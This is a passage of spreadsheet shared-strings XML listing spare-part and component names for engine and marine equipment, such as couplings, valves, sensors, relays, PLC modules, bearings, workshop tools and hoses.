    <t>ADHESIVE</t>
  </si>
  <si>
    <t>UNION WITH PIPE THREAD</t>
  </si>
  <si>
    <t>SLEEVE WITH HEXAGON</t>
  </si>
  <si>
    <t>PIPE UNION</t>
  </si>
  <si>
    <t>ADAPTER STRAIGHT MALE/FEM</t>
  </si>
  <si>
    <t>ADAPTER STRAIGHT MALE/MAL</t>
  </si>
  <si>
    <t>ADAPTER STRAIGHT FEM/FEM</t>
  </si>
  <si>
    <t>ELBOW CONNECTION</t>
  </si>
  <si>
    <t>TEE PIECE-SOCKET</t>
  </si>
  <si>
    <t>STRAIGHT STUD COUPLINGS</t>
  </si>
  <si>
    <t>ELBOW COUPLINGS</t>
  </si>
  <si>
    <t>BANJO SCREW</t>
  </si>
  <si>
    <t>TEE-SCREWED CONNECTION</t>
  </si>
  <si>
    <t>WELDING COUPLING</t>
  </si>
  <si>
    <t>STRAIGHT SCREW. CONN</t>
  </si>
  <si>
    <t>BANJO COUPLING, HOUSE</t>
  </si>
  <si>
    <t>CROSS UNION</t>
  </si>
  <si>
    <t>UNION NUT FOR SLEEVE</t>
  </si>
  <si>
    <t>SLEEVE FOR PIPE</t>
  </si>
  <si>
    <t>BODY OF COUPLING,STRAIGHT</t>
  </si>
  <si>
    <t>BODY OF COUPLING, ELBOW</t>
  </si>
  <si>
    <t>BODY OF COUPLING, TEE</t>
  </si>
  <si>
    <t>BODY OF COUPLING, CROSS</t>
  </si>
  <si>
    <t>QUICK COUPLING, PARTS FOR</t>
  </si>
  <si>
    <t>BELLOWS GLAND</t>
  </si>
  <si>
    <t>STRAIGHTWAY VALVE</t>
  </si>
  <si>
    <t>BUTTERFLY VALVE-DETAILS</t>
  </si>
  <si>
    <t>MOUNT.PLATE F.PILOT VALVE</t>
  </si>
  <si>
    <t>3/2-WAY PILOT VALVE</t>
  </si>
  <si>
    <t>BALL VALVE, SCREWED CONN.</t>
  </si>
  <si>
    <t>UNION NUT WITH SEAT</t>
  </si>
  <si>
    <t>VENTING PISTON</t>
  </si>
  <si>
    <t>CARTRIDGE V. CONTROLLER</t>
  </si>
  <si>
    <t>SPRAY NOZZLE, PLAIN</t>
  </si>
  <si>
    <t>SPRAY NOZZLE WITH FLANGE</t>
  </si>
  <si>
    <t>SPRAY NOZZLE, EXT. THREAD</t>
  </si>
  <si>
    <t>SPRAY NOZZLE, INT. THREAD</t>
  </si>
  <si>
    <t>ORIFICE PLUG, PLAIN</t>
  </si>
  <si>
    <t>ORIFICE PLUG WITH FLANGE</t>
  </si>
  <si>
    <t>ORIFICE PLUG, EXT.THREAD</t>
  </si>
  <si>
    <t>ORIFICE FLANGE</t>
  </si>
  <si>
    <t>EXPANSION SLEEVE</t>
  </si>
  <si>
    <t>PUMP, PNEUM. AND HYDR.</t>
  </si>
  <si>
    <t>REPAIR KIT</t>
  </si>
  <si>
    <t>PRESSURE GAUGE SUPPORT</t>
  </si>
  <si>
    <t>PRESSURE GAUGE UNIT</t>
  </si>
  <si>
    <t>RULE</t>
  </si>
  <si>
    <t>THERMOMET.LIQUID,STRAIGHT</t>
  </si>
  <si>
    <t>HEAT CONDUCTING PASTE</t>
  </si>
  <si>
    <t>PRESSURE EQUALIZER</t>
  </si>
  <si>
    <t>NAME PLATE MS901</t>
  </si>
  <si>
    <t>NAME PLATE MS902</t>
  </si>
  <si>
    <t>NAME PLATE MS903</t>
  </si>
  <si>
    <t>NAME PLATE MS904</t>
  </si>
  <si>
    <t>NAME PLATE MS905</t>
  </si>
  <si>
    <t>NAME PLATE MS906</t>
  </si>
  <si>
    <t>NAME PLATE MS907</t>
  </si>
  <si>
    <t>NAME PLATE MS908</t>
  </si>
  <si>
    <t>NAME PLATE MS909</t>
  </si>
  <si>
    <t>NAME PLATE MS910</t>
  </si>
  <si>
    <t>NAME PLATE MS912</t>
  </si>
  <si>
    <t>INTERMEDIATE BOX</t>
  </si>
  <si>
    <t>COMPONENT STORAGE CASE</t>
  </si>
  <si>
    <t>CONVERTER BOX</t>
  </si>
  <si>
    <t>CONTACT BOX</t>
  </si>
  <si>
    <t>GMS SYSTEM</t>
  </si>
  <si>
    <t>VMON UNIT</t>
  </si>
  <si>
    <t>PC INTERFACE</t>
  </si>
  <si>
    <t>PRINTED CIRCUIT BOARD</t>
  </si>
  <si>
    <t>CD-ROM, SOFTWARE</t>
  </si>
  <si>
    <t>ELECTRONIC COMPONENT</t>
  </si>
  <si>
    <t>INSULATED WIRE</t>
  </si>
  <si>
    <t>CABLE GLAND, REDUCING PCE</t>
  </si>
  <si>
    <t>CABLE GLAND, LOCK NUT</t>
  </si>
  <si>
    <t>CABLE GLAND, BLIND PLUG</t>
  </si>
  <si>
    <t>CABLE GLAND, ACCESSORIES</t>
  </si>
  <si>
    <t>FUSE, CARTRIDGE</t>
  </si>
  <si>
    <t>FUSE, AUTOMATIC,RESETABLE</t>
  </si>
  <si>
    <t>CABLE TIES</t>
  </si>
  <si>
    <t>CABLE NUMBERS</t>
  </si>
  <si>
    <t>CONNECTOR-PCB, PLUG</t>
  </si>
  <si>
    <t>CONNECTORS, ACCESSORIES</t>
  </si>
  <si>
    <t>TERMINALBAR</t>
  </si>
  <si>
    <t>COVER FOR CABLE DUCT</t>
  </si>
  <si>
    <t>CABLE SHOE</t>
  </si>
  <si>
    <t>INSULATING BLOCK</t>
  </si>
  <si>
    <t>GUARD MADE OF PVC</t>
  </si>
  <si>
    <t>CABLE TRAY-LADDER</t>
  </si>
  <si>
    <t>FITTING FOR LUMINAIRE</t>
  </si>
  <si>
    <t>TERMINAL BOX, COMPLETE</t>
  </si>
  <si>
    <t>ENCLOSURE, EMPTY</t>
  </si>
  <si>
    <t>ENCLOSURE, MACHINING</t>
  </si>
  <si>
    <t>ENCLOSURE, BASEPLATE</t>
  </si>
  <si>
    <t>ENCLOSURE, DIN RAIL</t>
  </si>
  <si>
    <t>ENCLOSURE, ACCESSORIES</t>
  </si>
  <si>
    <t>SELF-CLINCHING FASTENER</t>
  </si>
  <si>
    <t>STAND OFF</t>
  </si>
  <si>
    <t>LAMP GLASS, WHITE</t>
  </si>
  <si>
    <t>LAMP GLASS, RED</t>
  </si>
  <si>
    <t>LAMP GLASS, YELLOW</t>
  </si>
  <si>
    <t>LAMP GLASS, GREEN</t>
  </si>
  <si>
    <t>LAMP GLASS, BLUE</t>
  </si>
  <si>
    <t>BLIND FLANGE, OVAL</t>
  </si>
  <si>
    <t>Pressure transmitter</t>
  </si>
  <si>
    <t>Difference transmitter</t>
  </si>
  <si>
    <t>Pressure stat</t>
  </si>
  <si>
    <t>Difference pressurestat</t>
  </si>
  <si>
    <t>Test block</t>
  </si>
  <si>
    <t>Test valve</t>
  </si>
  <si>
    <t>Blind flange</t>
  </si>
  <si>
    <t>Instrument flange</t>
  </si>
  <si>
    <t>Shut-off valve</t>
  </si>
  <si>
    <t>Test cock</t>
  </si>
  <si>
    <t>Mounting plate</t>
  </si>
  <si>
    <t>Temperature sensor</t>
  </si>
  <si>
    <t>Thermostat</t>
  </si>
  <si>
    <t>Sensor pocket</t>
  </si>
  <si>
    <t>Nipple</t>
  </si>
  <si>
    <t>Exhaust gas temperature sensor</t>
  </si>
  <si>
    <t>Bearing temperature sensor</t>
  </si>
  <si>
    <t>NiCr sensor</t>
  </si>
  <si>
    <t>Thermometer</t>
  </si>
  <si>
    <t>Combi thermometer</t>
  </si>
  <si>
    <t>Dual pitch transmitter</t>
  </si>
  <si>
    <t>Displacement transmitter</t>
  </si>
  <si>
    <t>RPM pick-up</t>
  </si>
  <si>
    <t>Encoder</t>
  </si>
  <si>
    <t>Impulse strip</t>
  </si>
  <si>
    <t>Positions pick-up</t>
  </si>
  <si>
    <t>Limit switch</t>
  </si>
  <si>
    <t>Leakage oil sensor</t>
  </si>
  <si>
    <t>Level sensor</t>
  </si>
  <si>
    <t>Level switch</t>
  </si>
  <si>
    <t>Console</t>
  </si>
  <si>
    <t>Shielding</t>
  </si>
  <si>
    <t>Mounting parts</t>
  </si>
  <si>
    <t>Holder</t>
  </si>
  <si>
    <t>Bushing</t>
  </si>
  <si>
    <t>Stuffing box</t>
  </si>
  <si>
    <t>Oil mist detector</t>
  </si>
  <si>
    <t>Axial vibration</t>
  </si>
  <si>
    <t>Cable</t>
  </si>
  <si>
    <t>Flat cable</t>
  </si>
  <si>
    <t>Twisted cable</t>
  </si>
  <si>
    <t>Wire</t>
  </si>
  <si>
    <t>Power cable</t>
  </si>
  <si>
    <t>Data interface cable</t>
  </si>
  <si>
    <t>Cable marking</t>
  </si>
  <si>
    <t>Wire marking</t>
  </si>
  <si>
    <t>Heat shrinkable sleeving</t>
  </si>
  <si>
    <t>Shielding jacket</t>
  </si>
  <si>
    <t>Protective hose</t>
  </si>
  <si>
    <t>Cable tie</t>
  </si>
  <si>
    <t>Wire tie</t>
  </si>
  <si>
    <t>Row band</t>
  </si>
  <si>
    <t>Cable tray</t>
  </si>
  <si>
    <t>Cable duct</t>
  </si>
  <si>
    <t>Cable duct - flexible</t>
  </si>
  <si>
    <t>Cable pipe</t>
  </si>
  <si>
    <t>Cable tray accessories</t>
  </si>
  <si>
    <t>Cable shoe</t>
  </si>
  <si>
    <t>Cable gland</t>
  </si>
  <si>
    <t>Cutting ring</t>
  </si>
  <si>
    <t>Stopping plug</t>
  </si>
  <si>
    <t>Nut for cable gland</t>
  </si>
  <si>
    <t>Neopren bush</t>
  </si>
  <si>
    <t>Terminal box</t>
  </si>
  <si>
    <t>Prefabricated terminal box</t>
  </si>
  <si>
    <t>Cabinet</t>
  </si>
  <si>
    <t>Prefabricated cabinet</t>
  </si>
  <si>
    <t>Spacer</t>
  </si>
  <si>
    <t>Rubber damper</t>
  </si>
  <si>
    <t>Row terminal</t>
  </si>
  <si>
    <t>End stop</t>
  </si>
  <si>
    <t>Terminal plate</t>
  </si>
  <si>
    <t>Fuse terminal</t>
  </si>
  <si>
    <t>Connecting bridge</t>
  </si>
  <si>
    <t>Marking Nos.</t>
  </si>
  <si>
    <t>Test plug</t>
  </si>
  <si>
    <t>Division</t>
  </si>
  <si>
    <t>Inlet connection</t>
  </si>
  <si>
    <t>Warning sign</t>
  </si>
  <si>
    <t>Opto coupler</t>
  </si>
  <si>
    <t>Mounting rail</t>
  </si>
  <si>
    <t>Relay</t>
  </si>
  <si>
    <t>Time delayed relay</t>
  </si>
  <si>
    <t>Flash relay</t>
  </si>
  <si>
    <t>Latch relay</t>
  </si>
  <si>
    <t>Fleeting relay</t>
  </si>
  <si>
    <t>Thermo relay</t>
  </si>
  <si>
    <t>Contactor</t>
  </si>
  <si>
    <t>Temperature limit switch</t>
  </si>
  <si>
    <t>Tacho relay</t>
  </si>
  <si>
    <t>Relay socket</t>
  </si>
  <si>
    <t>Adapter for DIN-rail</t>
  </si>
  <si>
    <t>Labels for relay</t>
  </si>
  <si>
    <t>Limit relay</t>
  </si>
  <si>
    <t>Calculator relay</t>
  </si>
  <si>
    <t>Signal isolator</t>
  </si>
  <si>
    <t>Transmitter</t>
  </si>
  <si>
    <t>R/I transmitter</t>
  </si>
  <si>
    <t>Converter</t>
  </si>
  <si>
    <t>Pick-up amplifier</t>
  </si>
  <si>
    <t>Pick-up limiter</t>
  </si>
  <si>
    <t>Pick-up filter</t>
  </si>
  <si>
    <t>Transformer</t>
  </si>
  <si>
    <t>Power supply</t>
  </si>
  <si>
    <t>Plug - complete</t>
  </si>
  <si>
    <t>Plug - female</t>
  </si>
  <si>
    <t>Plug - male</t>
  </si>
  <si>
    <t>Code pins</t>
  </si>
  <si>
    <t>Crimp contact</t>
  </si>
  <si>
    <t>Plug socket</t>
  </si>
  <si>
    <t>Angle plug</t>
  </si>
  <si>
    <t>Gasket for plug</t>
  </si>
  <si>
    <t>Spring-loaded plug</t>
  </si>
  <si>
    <t>AP-panel</t>
  </si>
  <si>
    <t>Front label</t>
  </si>
  <si>
    <t>Emergency telegraph panel</t>
  </si>
  <si>
    <t>Telegraph gong</t>
  </si>
  <si>
    <t>Rotating flashlight</t>
  </si>
  <si>
    <t>Emergency telegraph box</t>
  </si>
  <si>
    <t>Electric shaft control box</t>
  </si>
  <si>
    <t>Manoeuvre handle</t>
  </si>
  <si>
    <t>Clamp fixture</t>
  </si>
  <si>
    <t>Starting box</t>
  </si>
  <si>
    <t>Alarm panel</t>
  </si>
  <si>
    <t>Q80 Instrument</t>
  </si>
  <si>
    <t>Q96 Instrument</t>
  </si>
  <si>
    <t>Q144 instrument</t>
  </si>
  <si>
    <t>Instrument</t>
  </si>
  <si>
    <t>Q48 instrument</t>
  </si>
  <si>
    <t>Q72 instrument</t>
  </si>
  <si>
    <t>Scale for instrument</t>
  </si>
  <si>
    <t>Dimension sketch instrument</t>
  </si>
  <si>
    <t>Tachometer</t>
  </si>
  <si>
    <t>Pressure gauge</t>
  </si>
  <si>
    <t>Hour counter</t>
  </si>
  <si>
    <t>Lamp</t>
  </si>
  <si>
    <t>Sign for Q96 instrument</t>
  </si>
  <si>
    <t>Lens cap</t>
  </si>
  <si>
    <t>Indicator button</t>
  </si>
  <si>
    <t>Push button</t>
  </si>
  <si>
    <t>Frame</t>
  </si>
  <si>
    <t>Frontring</t>
  </si>
  <si>
    <t>Legend plate</t>
  </si>
  <si>
    <t>Legend cap</t>
  </si>
  <si>
    <t>Blind plate</t>
  </si>
  <si>
    <t>Lamp glass</t>
  </si>
  <si>
    <t>Connector cover</t>
  </si>
  <si>
    <t>Switching element</t>
  </si>
  <si>
    <t>Buzzer</t>
  </si>
  <si>
    <t>Emergency stop</t>
  </si>
  <si>
    <t>Interlocking switch</t>
  </si>
  <si>
    <t>Selector switch</t>
  </si>
  <si>
    <t>Knob</t>
  </si>
  <si>
    <t>Stator</t>
  </si>
  <si>
    <t>Slotter nut</t>
  </si>
  <si>
    <t>Nut cover</t>
  </si>
  <si>
    <t>Cap</t>
  </si>
  <si>
    <t>Arresting device</t>
  </si>
  <si>
    <t>Figure dial</t>
  </si>
  <si>
    <t>Dimmer</t>
  </si>
  <si>
    <t>Dimmer potentiometer</t>
  </si>
  <si>
    <t>Rotary switch</t>
  </si>
  <si>
    <t>Dismantling tool</t>
  </si>
  <si>
    <t>Lens remover</t>
  </si>
  <si>
    <t>Incandescent bulb remover+B95</t>
  </si>
  <si>
    <t>Sign for button 12.7x18.7</t>
  </si>
  <si>
    <t>Sign for lamp glass 24x48</t>
  </si>
  <si>
    <t>PLC module</t>
  </si>
  <si>
    <t>Eprom - memory pack</t>
  </si>
  <si>
    <t>PLC power supply</t>
  </si>
  <si>
    <t>PLC expansion base unit</t>
  </si>
  <si>
    <t>Analog module</t>
  </si>
  <si>
    <t>Digital module</t>
  </si>
  <si>
    <t>Filter module</t>
  </si>
  <si>
    <t>Tacho module</t>
  </si>
  <si>
    <t>Serial interface module</t>
  </si>
  <si>
    <t>Adapter module</t>
  </si>
  <si>
    <t>Print card</t>
  </si>
  <si>
    <t>Print card holder</t>
  </si>
  <si>
    <t>PLC base unit</t>
  </si>
  <si>
    <t>BM2-module</t>
  </si>
  <si>
    <t>BM-module</t>
  </si>
  <si>
    <t>OM-module</t>
  </si>
  <si>
    <t>Module</t>
  </si>
  <si>
    <t>Hand held programmer</t>
  </si>
  <si>
    <t>Digital speed control</t>
  </si>
  <si>
    <t>Generator load sensor</t>
  </si>
  <si>
    <t>Keyboard</t>
  </si>
  <si>
    <t>PC</t>
  </si>
  <si>
    <t>Monitor</t>
  </si>
  <si>
    <t>Printer</t>
  </si>
  <si>
    <t>PC-accessories</t>
  </si>
  <si>
    <t>Mouse</t>
  </si>
  <si>
    <t>Track ball</t>
  </si>
  <si>
    <t>Marine kit PC</t>
  </si>
  <si>
    <t>Marine kit monitor</t>
  </si>
  <si>
    <t>Resistor</t>
  </si>
  <si>
    <t>Diode</t>
  </si>
  <si>
    <t>Fuse</t>
  </si>
  <si>
    <t>Capacitor</t>
  </si>
  <si>
    <t>Transistor</t>
  </si>
  <si>
    <t>Potentiometer</t>
  </si>
  <si>
    <t>Motor potentiometer</t>
  </si>
  <si>
    <t>Spark plug extension</t>
  </si>
  <si>
    <t>High voltage parts</t>
  </si>
  <si>
    <t>Spark plug</t>
  </si>
  <si>
    <t>Ignition system</t>
  </si>
  <si>
    <t>Tools</t>
  </si>
  <si>
    <t>Multimeter</t>
  </si>
  <si>
    <t>Calibrator</t>
  </si>
  <si>
    <t>Sign - brass</t>
  </si>
  <si>
    <t>Label adhesive</t>
  </si>
  <si>
    <t>Linear Actuator</t>
  </si>
  <si>
    <t>Electric/pneumatic converter</t>
  </si>
  <si>
    <t>Power output sensor</t>
  </si>
  <si>
    <t>Regulator</t>
  </si>
  <si>
    <t>Solenoid valve</t>
  </si>
  <si>
    <t>Reduction valve</t>
  </si>
  <si>
    <t>CLAW COUPLING</t>
  </si>
  <si>
    <t>FRICTION COUPLING, SAFETY</t>
  </si>
  <si>
    <t>SLEEVE COUPLING</t>
  </si>
  <si>
    <t>FREE WHEELING COUPLING</t>
  </si>
  <si>
    <t>PARTS FOR COUPLING</t>
  </si>
  <si>
    <t>BALL JOINT</t>
  </si>
  <si>
    <t>TOMMY BAR</t>
  </si>
  <si>
    <t>CHAIN WHEEL-SINGLE</t>
  </si>
  <si>
    <t>INNER AND OUTER LINKS</t>
  </si>
  <si>
    <t>OUTER LINK</t>
  </si>
  <si>
    <t>INNER LINK</t>
  </si>
  <si>
    <t>FINAL CH.LINK W.SHACKLE</t>
  </si>
  <si>
    <t>SCREW-SPECIAL HEADS</t>
  </si>
  <si>
    <t>STUD WITH NUT</t>
  </si>
  <si>
    <t>NUT WITH LOCKING RING</t>
  </si>
  <si>
    <t>SCREW WITH NUT</t>
  </si>
  <si>
    <t>SPAREPARTS FOR HYD. JACKS</t>
  </si>
  <si>
    <t>PIPE CLAMP-1 FLAP</t>
  </si>
  <si>
    <t>CLAMP (ONE PART)</t>
  </si>
  <si>
    <t>CLAMP WITH LOCK</t>
  </si>
  <si>
    <t>MASTER LINK FOR CHAIN</t>
  </si>
  <si>
    <t>CLOSING DEVICE</t>
  </si>
  <si>
    <t>DOOR HOLDER</t>
  </si>
  <si>
    <t>SLIDE BEARING COMPLETE</t>
  </si>
  <si>
    <t>BALL BEAR. W. FOOT,RADIAL</t>
  </si>
  <si>
    <t>ROLLER BEAR.W.FOOT,RADIAL</t>
  </si>
  <si>
    <t>NEEDLE BEAR.W.FOOT,RADIAL</t>
  </si>
  <si>
    <t>NEEDLE BEARING W. ROLLER</t>
  </si>
  <si>
    <t>BEARING W. FLANGE, RADIAL</t>
  </si>
  <si>
    <t>BALL BEARING, RADIAL</t>
  </si>
  <si>
    <t>ROLLER BEARING, RADIAL</t>
  </si>
  <si>
    <t>NEEDLE BEARING, RADIAL</t>
  </si>
  <si>
    <t>BALL BEAR. W. FOOT, AXIAL</t>
  </si>
  <si>
    <t>ROLLER BEAR. W.FOOT,AXIAL</t>
  </si>
  <si>
    <t>NEEDLE BEAR.W.FOOT, AXIAL</t>
  </si>
  <si>
    <t>BEARING W. FLANGE, AXIAL</t>
  </si>
  <si>
    <t>BALL BEARING, AXIAL</t>
  </si>
  <si>
    <t>ROLLER BEARING, AXIAL</t>
  </si>
  <si>
    <t>NEEDLE BEARING, AXIAL</t>
  </si>
  <si>
    <t>CURVE ROLLER</t>
  </si>
  <si>
    <t>PISTON WITH PISTON RINGS</t>
  </si>
  <si>
    <t>SUPPORT OF RUBBER</t>
  </si>
  <si>
    <t>BASE FOR SUPPORT</t>
  </si>
  <si>
    <t>SUPPORT, ANGULAR PLATE</t>
  </si>
  <si>
    <t>WORKTABLE</t>
  </si>
  <si>
    <t>BRACKET (FOR WORKTABLE)</t>
  </si>
  <si>
    <t>BRACKET FOR SIG BOX</t>
  </si>
  <si>
    <t>COVER,CIRCULAR W HANDLE</t>
  </si>
  <si>
    <t>COVER, RECTANG. W HANDLE</t>
  </si>
  <si>
    <t>COVER, OVAL WITH HANDLE</t>
  </si>
  <si>
    <t>ROTARY PACKING</t>
  </si>
  <si>
    <t>SCRAPER RING-METAL</t>
  </si>
  <si>
    <t>SCRAPER RING - AXIAL</t>
  </si>
  <si>
    <t>SEALING RING-STEEL+C.IRON</t>
  </si>
  <si>
    <t>KANTSEAL WITH BACK-UP</t>
  </si>
  <si>
    <t>SEALING RING W. BACK-UP</t>
  </si>
  <si>
    <t>SEALING RING-RUBBER CLAD</t>
  </si>
  <si>
    <t>SOCKET OR HOUSING</t>
  </si>
  <si>
    <t>TANK BOX-SHAPED</t>
  </si>
  <si>
    <t>DRAIN BOX W. LEVEL SWITCH</t>
  </si>
  <si>
    <t>PRESSURE TANK</t>
  </si>
  <si>
    <t>VESSEL-CYLINDRICAL</t>
  </si>
  <si>
    <t>MOUNTING OF SIG BOX</t>
  </si>
  <si>
    <t>FOREIGN DRW. (REQUESTED AT LIC)</t>
  </si>
  <si>
    <t>INSULATION PAD, CIRCULAR</t>
  </si>
  <si>
    <t>INSULATION PAD</t>
  </si>
  <si>
    <t>SLIP-ON WELD. STEEL PIPE</t>
  </si>
  <si>
    <t>UNION NUTS</t>
  </si>
  <si>
    <t>NON-RETURN VALVE, MALE</t>
  </si>
  <si>
    <t>STRAIGHT FEMALE COUPLING</t>
  </si>
  <si>
    <t>ADJUSTABLE L-COUPL.COMPL.</t>
  </si>
  <si>
    <t>ADJ. STRAIGHT MALE COUPL.</t>
  </si>
  <si>
    <t>STRAIGHT COUPLINGS</t>
  </si>
  <si>
    <t>ADJ.ELBOW COUPL.W.RESTRIC</t>
  </si>
  <si>
    <t>EQUAL TEE COUPLINGS</t>
  </si>
  <si>
    <t>BANJO COUPLINGS</t>
  </si>
  <si>
    <t>STRAIGTH COUPL. W.RESTRIC</t>
  </si>
  <si>
    <t>SHEILD FOR FLANGE</t>
  </si>
  <si>
    <t>SPARE PARTS F. BALL VALVE</t>
  </si>
  <si>
    <t>MOUNT. OF FLOW SWITCH</t>
  </si>
  <si>
    <t>AUTOMATIC PANEL</t>
  </si>
  <si>
    <t>START AND JETASSIST. BOX</t>
  </si>
  <si>
    <t>STARTBOX</t>
  </si>
  <si>
    <t>ACCESSORIES FOR S-SYSTEM</t>
  </si>
  <si>
    <t>CONTACT BLOCK</t>
  </si>
  <si>
    <t>PROTECTIVE HOSES</t>
  </si>
  <si>
    <t>HOLDER FOR CABELE BINDER</t>
  </si>
  <si>
    <t>SOCKET WRENCH,SLOTTED NUT</t>
  </si>
  <si>
    <t>TEE HAND. KEY HEX. SOCKET</t>
  </si>
  <si>
    <t>PIN WRENCH-SPECIAL</t>
  </si>
  <si>
    <t>OPEN JAW WRENCH-ADJUSTAB.</t>
  </si>
  <si>
    <t>RATCHET WRENCH</t>
  </si>
  <si>
    <t>TORQUE WRENCH</t>
  </si>
  <si>
    <t>UNIVERSAL JOINTS, SQUARE</t>
  </si>
  <si>
    <t>ANGLE HANDLE</t>
  </si>
  <si>
    <t>WRENCH-OFFSET</t>
  </si>
  <si>
    <t>RACK FOR EYE BOLTS</t>
  </si>
  <si>
    <t>CHAIN ASSEMBLING TOOL</t>
  </si>
  <si>
    <t>SCREW CLAMP</t>
  </si>
  <si>
    <t>STUD SETTER</t>
  </si>
  <si>
    <t>DRAWING TOOL-CROSS MEMBER</t>
  </si>
  <si>
    <t>DRAWING TOOL, PARTS</t>
  </si>
  <si>
    <t>DRAWING TOOL-HYDR.JACK</t>
  </si>
  <si>
    <t>MOUNTING CONE FOR SPRING</t>
  </si>
  <si>
    <t>PARTS-INTERNAL EXTRACTOR</t>
  </si>
  <si>
    <t>PARTS-EXTERNAL EXTRACTOR</t>
  </si>
  <si>
    <t>EXTRACTOR COMPLETE</t>
  </si>
  <si>
    <t>JACK-HYDRAULIC, TOOLS</t>
  </si>
  <si>
    <t>JACK-HYDR., WITHOUT PUMP</t>
  </si>
  <si>
    <t>JACK-HYDRAULIC(WITH PUMP)</t>
  </si>
  <si>
    <t>JACK-HYDR.(WITHOUT PUMP)</t>
  </si>
  <si>
    <t>JACK-HYDRAULIC(FITTINGS)</t>
  </si>
  <si>
    <t>JACK-MECHANICAL(THREAD)</t>
  </si>
  <si>
    <t>GUIDE FOR SPINDLE</t>
  </si>
  <si>
    <t>GUIDE WITH INSIDE CONE</t>
  </si>
  <si>
    <t>GUIDE WITH OUTSIDE CONE</t>
  </si>
  <si>
    <t>GUIDE WITH IN + OUTS.CONE</t>
  </si>
  <si>
    <t>GUIDE WITH RECESS</t>
  </si>
  <si>
    <t>CENTRE CAP</t>
  </si>
  <si>
    <t>GUIDE PIN WITH CONE</t>
  </si>
  <si>
    <t>GUIDE PIN WITH FLANGE</t>
  </si>
  <si>
    <t>JIG COMPLETE</t>
  </si>
  <si>
    <t>PIN VICE</t>
  </si>
  <si>
    <t>GUIDE TOOLS-SLIDE SHOE</t>
  </si>
  <si>
    <t>TACKLE</t>
  </si>
  <si>
    <t>WIRE TACKLE</t>
  </si>
  <si>
    <t>CHAIN TACKLE</t>
  </si>
  <si>
    <t>HOOK IRON</t>
  </si>
  <si>
    <t>BEAM CLAW</t>
  </si>
  <si>
    <t>CLAMP WITH STUDS</t>
  </si>
  <si>
    <t>TRAVELLING TROLLEY</t>
  </si>
  <si>
    <t>TRAVEL.TROLLEY WITH BRAKE</t>
  </si>
  <si>
    <t>CHAFING MAT</t>
  </si>
  <si>
    <t>TROLLEY 4-WHEEL</t>
  </si>
  <si>
    <t>TROLLEY 2-WHEEL</t>
  </si>
  <si>
    <t>PARTS FOR TROLLEY</t>
  </si>
  <si>
    <t>STAY FOR TILTING TOOL</t>
  </si>
  <si>
    <t>BALANCING RING ASSEMBLY</t>
  </si>
  <si>
    <t>WORKING PLATFORM COMPLETE</t>
  </si>
  <si>
    <t>LIFT.TOOL F.HYDR.MOTOR</t>
  </si>
  <si>
    <t>LIFTING ATTACHMENT-COLLAR</t>
  </si>
  <si>
    <t>COLLAR FOR STUFFING BOX</t>
  </si>
  <si>
    <t>END MILL COMPLETE</t>
  </si>
  <si>
    <t>CUTTER-SPECIAL-COMPLETE</t>
  </si>
  <si>
    <t>SCISSORS</t>
  </si>
  <si>
    <t>GRINDING MANDREL COMPLETE</t>
  </si>
  <si>
    <t>GRINDING RING COMPLETE</t>
  </si>
  <si>
    <t>GRINDING MACHINE, SURFACE</t>
  </si>
  <si>
    <t>GRINDING MACHINE, CONICAL</t>
  </si>
  <si>
    <t>SPADE DRILL BAR</t>
  </si>
  <si>
    <t>SPADE DRILL BLADES</t>
  </si>
  <si>
    <t>EXT.SOCKET FOR HYDRAULICS</t>
  </si>
  <si>
    <t>TURNING TOOL WITH INSERTS</t>
  </si>
  <si>
    <t>BORING BAR WITH INSERTS</t>
  </si>
  <si>
    <t>HYDR.UNIT FOR DRILL.MACH.</t>
  </si>
  <si>
    <t>HOLDER FOR SCRAPER PLATE</t>
  </si>
  <si>
    <t>SCRAPER COMPLETE</t>
  </si>
  <si>
    <t>SCRAPER</t>
  </si>
  <si>
    <t>CLEANING DRILL</t>
  </si>
  <si>
    <t>CLEANING BRUSH</t>
  </si>
  <si>
    <t>TUBE EXPANDER COMPLETE</t>
  </si>
  <si>
    <t>MEASURING+CHECKING TOOLS</t>
  </si>
  <si>
    <t>INDICATOR PAPER</t>
  </si>
  <si>
    <t>DYNAMOMETER</t>
  </si>
  <si>
    <t>MICROMETER HEAD</t>
  </si>
  <si>
    <t>STAND FOR DIAL GAUGE</t>
  </si>
  <si>
    <t>PLANIMETER</t>
  </si>
  <si>
    <t>PIN GAUGE-ADJUSTABLE</t>
  </si>
  <si>
    <t>PIN GAUGE-STRAIGHT</t>
  </si>
  <si>
    <t>EXTENSION FOR PIN GAUGE</t>
  </si>
  <si>
    <t>PIN GAUGE SET</t>
  </si>
  <si>
    <t>FEELER GAUGE SET</t>
  </si>
  <si>
    <t>SLIDE CALIPER</t>
  </si>
  <si>
    <t>TEST MANDREL</t>
  </si>
  <si>
    <t>TEST MANDREL, TOLERANCE</t>
  </si>
  <si>
    <t>ADJUSTMENT-FITTING GAUGES</t>
  </si>
  <si>
    <t>MIRROR</t>
  </si>
  <si>
    <t>PIPE-STRAIGHT W. STUBS</t>
  </si>
  <si>
    <t>HOSE-STEEL WITH 1 FLANGE</t>
  </si>
  <si>
    <t>HOSE-STEEL WITH 2 FLANGES</t>
  </si>
  <si>
    <t>HOSE-STEEL WITH 1 PIPE</t>
  </si>
  <si>
    <t>HOSE-STEEL WITH 2 PIPES</t>
  </si>
  <si>
    <t>HOSE-STEEL WITH 1 UNION</t>
  </si>
  <si>
    <t>HOSE-STEEL WITH 2 UNION</t>
  </si>
  <si>
    <t>HOSE WITH 2 COUPLINGS</t>
  </si>
  <si>
    <t>HOSE WITH 1 COUPLING</t>
  </si>
  <si>
    <t>HOSE ASSEMBLY 1-2 HOSES</t>
  </si>
  <si>
    <t>HOSE ASSEMBLY 3 HOSES</t>
  </si>
  <si>
    <t>HOSE ASSEMBLY 5 HOSES</t>
  </si>
  <si>
    <t>PIPE,STRA.W.THREAD/FLANGE</t>
  </si>
  <si>
    <t>PIPE,STRAIGHT, W.1 FLANGE</t>
  </si>
  <si>
    <t>PIPE,STRAIGHT, W.2 FLANGE</t>
  </si>
  <si>
    <t>PIPE,BEND,W THREAD/FLANGE</t>
  </si>
  <si>
    <t>PIPE,BEND, W. 2 FLANGES</t>
  </si>
  <si>
    <t>PIPE,BEND WITH UNION</t>
  </si>
  <si>
    <t>PIPE-NON STEEL,BEND</t>
  </si>
  <si>
    <t>PIPE-NON STEEL,BEND,UNION</t>
  </si>
  <si>
    <t>RUBBER BEND WITH FLANGES</t>
  </si>
  <si>
    <t>WELDING-ON STUBS</t>
  </si>
  <si>
    <t>BRANCH PIECE</t>
  </si>
  <si>
    <t>FUNNEL WITH PLAIN PIPE</t>
  </si>
